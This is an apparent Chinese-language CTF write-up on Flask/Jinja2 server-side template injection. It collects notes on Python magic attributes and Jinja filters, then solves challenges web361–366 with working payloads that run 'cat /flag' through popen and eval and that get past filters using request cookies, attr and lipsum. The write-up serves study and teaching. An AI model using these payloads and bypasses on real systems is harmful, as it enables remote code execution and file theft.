首页 > 其他分享 >ssti注入

ssti注入

时间:2023-04-29 19:12:10浏览次数:32  
标签:__ .__ builtins globals request popen ssti 注入

笔记:

__class__            类的一个内置属性,表示实例对象的类。
 
__base__             类型对象的直接基类
 
__bases__            类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__
 
__mro__              method resolution order,即解析方法调用的顺序;此属性是由类组成的元            组,在方法解析期间会基于它来查找基类。
 
__subclasses__()     返回这个类的子类集合,每个类都保留一个对其直接子类的弱引用列表。该方法返回一个列表,其中包含所有仍然存在的引用。列表按照定义顺序排列。
 
__init__             初始化类,返回的类型是function
 
__globals__          使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。
 
__dic__              类的静态函数、类函数、普通函数、全局变量以及一些内置的属性都是放在类的__dict__里
 
__getattribute__()   实例、类、函数都具有的__getattribute__魔术方法。事实上,在实例化的对象进行.操作的时候(形如:a.xxx/a.xxx()),都会自动去调用__getattribute__方法。因此我们同样可以直接通过这个方法来获取到实例、类、函数的属性。
 
__getitem__()        调用字典中的键值,其实就是调用这个魔术方法,比如a['b'],就是a.__getitem__('b')
 
__builtins__         内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。__builtins__与__builtin__的区别就不放了,百度都有。
 
__import__           动态加载类和函数,也就是导入模块,经常用于导入os模块,__import__('os').popen('ls').read()]
 
__str__()            返回描写这个对象的字符串,可以理解成就是打印出来。
 
url_for              flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
 
get_flashed_messages flask的一个方法,可以用于得到__builtins__,而且url_for.__globals__['__builtins__']含有current_app。
 
lipsum               flask的一个方法,可以用于得到__builtins__,而且lipsum.__globals__含有os模块:{{lipsum.__globals__['os'].popen('ls').read()}}
 
current_app          应用上下文,一个全局变量。
 
request              可以用于获取字符串来绕过,包括下面这些,引用一下羽师傅的。此外,同样可以获取open函数:request.__init__.__globals__['__builtins__'].open('/proc\self\fd/3').read()
 
request.args.x1        get传参
 
request.values.x1      所有参数
 
request.cookies      cookies参数
 
request.headers      请求头参数
 
request.form.x1        post传参    (Content-Type:applicaation/x-www-form-urlencoded或multipart/form-data)
 
request.data           post传参    (Content-Type:a/b)
 
request.json         post传json  (Content-Type: application/json)
 
config               当前application的所有配置。此外,也可以这样{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}
 
g                    {{g}}得到<flask.g of 'flask_ssti'>

常用的过滤器:

int():将值转换为int类型;
 
float():将值转换为float类型;
 
lower():将字符串转换为小写;
 
upper():将字符串转换为大写;
 
title():把值中的每个单词的首字母都转成大写;
 
capitalize():把变量值的首字母转成大写,其余字母转小写;
 
trim():截取字符串前面和后面的空白字符;
 
wordcount():计算一个长字符串中单词的个数;
 
reverse():字符串反转;
 
replace(value,old,new): 替换将old替换为new的字符串;
 
truncate(value,length=255,killwords=False):截取length长度的字符串;
 
striptags():删除字符串中所有的HTML标签,如果出现多个空格,将替换成一个空格;
 
escape()或e:转义字符,会将<、>等符号转义成HTML中的符号。显例:content|escape或content|e。
 
safe(): 禁用HTML转义,如果开启了全局转义,那么safe过滤器会将变量关掉转义。示例: {{'<em>hello</em>'|safe}};
 
list():将变量列成列表;
 
string():将变量转换成字符串;
 
join():将一个序列中的参数值拼接成字符串。示例看上面payload;
 
abs():返回一个数值的绝对值;
 
first():返回一个序列的第一个元素;
 
last():返回一个序列的最后一个元素;
 
format(value,arags,*kwargs):格式化字符串。比如:{{ "%s" - "%s"|format('Hello?',"Foo!") }}将输出:Helloo? - Foo!
 
length():返回一个序列或者字典的长度;
 
sum():返回列表内数值的和;
 
sort():返回排序后的列表;
 
default(value,default_value,boolean=false):如果当前变量没有值,则会使用参数中的值来代替。示例:name|default('xiaotuo')----如果name不存在,则会使用xiaotuo来替代。boolean=False默认是在只有这个变量为undefined的时候才会使用default中的值,如果想使用python的形式判断是否为false,则可以传递boolean=true。也可以使用or来替换。
 
length()返回字符串的长度,别名是count

 

web361

思路其实很简单,首先得到空字符串的类,用.__class__就可以得到空字符串类。

 

 得到了空字符串类之后,我们就需要去找基类,这里我们使用__base__来找,当然也可以用__bases__来找全部基类,这道题刚好他的基类就是object,所以直接通过__base__来找。

 

 找到基类后我们就查看基类下的所以类,这里用到__subclasses__()进行查看,我们找到os._wrap_close这个类并且使用这个类中的popen方法。(我们通过[]的下标索引来找到这个类)

 

 

 

 接着我们初始化这个类。

 

 

然后再找这个类中的所有变量和方法。

 然后我们就可以通过popen方法来读取flag文件

 

payload:{{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

web362

对于数字2,3进行了过滤

绕过方式一、使用全半角数字进行绕过:(切换的中文输入法里面进行全半角切换)

payload:?name={{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

绕过方法二、使用__builtins__

 

python2和python3两个版本通用的方法
__builtins__代码执行
__builtins__ 内建名称空间,内建名称空间有许多名字到对象之间映射,而这些名字其实就是内建函数的名称,对象就是这些内建函数本身。即里面有很多常用的函数。
在启动Python解释器后,就可以直接使用一些函数.
这些函数称为内建函数,在__builtins__模块中,Python在启动时就直接为我们导入了。准确的说,Python在启动时会首先加载内建名称空间,内建名称空间中有许多名字到对象之间的映射,这些名字就是内建函数的名称,对象就是这些内建函数对象。可以使用dir(builtins)来查看调用方法的列表,然后可以发现__builtins__下有eval,__import__等的函数,因此可以利用此来执行命令。

 

payload:?name={{x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /flag').read()")}}

 web 363

对于单双引号进行了过滤:

使用request进行绕过

 

payload:?name={{x.__init__.__globals__[request.args.x1].eval(request.args.x2)}}&x1=__builtins__&x2=__import__('os').popen('cat /flag').read()

 

web 364

过滤引号和args,这里用cookie传参绕过:

 

payload:?name={{url_for.__globals__[request.cookies.a][request.cookies.b](request.cookies.c).read()}}

cookie传参:a=os;b=popen;c=cat /flag

或者

payload:?name={{x.__init__.__globals__[request.cookies.a].eval(request.cookies.b)}}

cookie传参:a=__builtins__;b=__import__("os").popen("cat /flag").read()

 

web 365

过滤了引号,还有中括号,但request.cookies仍然可以用。

 

?name={{url_for.__globals__.os.popen(request.cookies.a).read()}}

cookie传参:a=cat /flag

web 366

过滤了下划线。用内置方法lipsum绕过,

payload:?name={{(lipsum|attr(request.cookies.a)).os.popen(request.cookies.b).read()}}

cookie传参:a=__globals__;b=cat /flag

 

attr用于获取变量:常见于点号(.)被过滤,或者点号(.)和中括号([])都被过滤的情况。

 

""|attr("__class__")
相当于
"".__class__

 

标签:__,.__,builtins,globals,request,popen,ssti,注入
From: https://www.cnblogs.com/kode00/p/17353251.html

相关文章

  • 记一次sql注入测试
    SQL注入是通过在用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为。常见SQL注入语句$username=1'or'1'='1$password=1'or'1'='1$username=1'or'1'='1'))/*$password=foohttp://192.168.254.132/sqli-labs/Less-1/?i......
  • log4j JNDI注入漏洞
    log4jJNDI注入漏洞目录log4jJNDI注入漏洞一、LDAP介绍二、JDBC介绍三、JNDI介绍四、JNDI命名引用五、log4jJNDI注入漏洞一、LDAP介绍​ LDAP是一种协议,LDAP的全称是LightweightDirectoryAccessProtocol,轻量目录访问协议。二、JDBC介绍​ JDBC是一种规范,JDBC的全称......
  • sql注入(三)盲注
    何为盲注? 盲注就是在sql注入过程中,执行语句后,选择的数据不能回显到前端页面,此时我们需要利用一些方法进行判断或尝试,这个过程称之为盲注。盲注可以分布尔盲注和时间盲注。 布尔盲注——构造逻辑判断三大法宝mid(),left(),substr()mid()函数此函数为截取字......
  • 注入依赖对象
    知识点:【基本类型对象注入:<beanid="orderService"class="cn.itcast.service.OrderServiceBean"><constructor-argindex=“0”type=“java.lang.String”value=“xxx”/>//构造器注入<propertyname=“name”value=“zh......
  • Langchain框架 prompt injection注入
    Langchain框架promptinjection注入PromptInjection是一种攻击技术,黑客或恶意攻击者操纵AI模型的输入值,以诱导模型返回非预期的结果Langchain框架LangChain是一个基于大语言模型进行应用开发的框架。所谓大语言模型(LargeLanguageModels,LLMs),是指基于海量语料训练、......
  • .NET CORE 通过依赖注入获取所有的的实现
    先定义一个接口1///<summary>2///支付接口3///</summary>4publicinterfaceIPaymentService5{67///<summary>8///支付类型9///</summary>10publicstringPayType{get;......
  • Spring17_配置文件依赖注入4
    一、Bean的依赖注入入门1.创建UserService,UserService内部再调用UserDao的save()方法 2.将UserServiceImpl的创建权交给Spring3.从Spring容器中获得UserService进行操作执行UserController中的main方法,检查控制台输出:二、Bean的依赖......
  • 记一次峰回路转的注入
    0X01背景自己之前写过一篇记录,当时是由于之前是一位校友刚做开发,叫我友情帮忙测试一波,由于是开发的新手,漏洞比较多,所以直接从注入开始讲起,但是到getshell的过程也算是一场峰回路转再跌跌撞撞的路程。0x02注入测试判断注入是否存在http://11X.XX.XXX.XX/test/sub_hack.php?id......
  • map注入 ,使用 @ConfigurationProperties , 修改apollo配置后不会动态修改的问题
    问题:apollo动态刷新,应用在@value这种注入方式的属性没有问题,但是如果使用@ConfigurationProperties注解的bean,动态刷新就不好使了,会注入不到的。Apollo动态刷新官网介绍需要注意的是,@ConfigurationProperties如果需要在Apollo配置变化时自动更新注入的值,需要配合使用Environm......
  • SQL注入(宽字节注入)
    宽字节注入原理在数据库中使用了宽字符集(GBK,GB2312等),除了英文都是一个字符占两字节;MySQL在使用GBK编码的时候,会认为两个字符为一个汉字(ascii>128才能达到汉字范围);在PHP中使用addslashes函数的时候,会对单引号%27进行转义,在前边加一个反斜杠”\”,变成%5c%27;可以在前边添加%df,......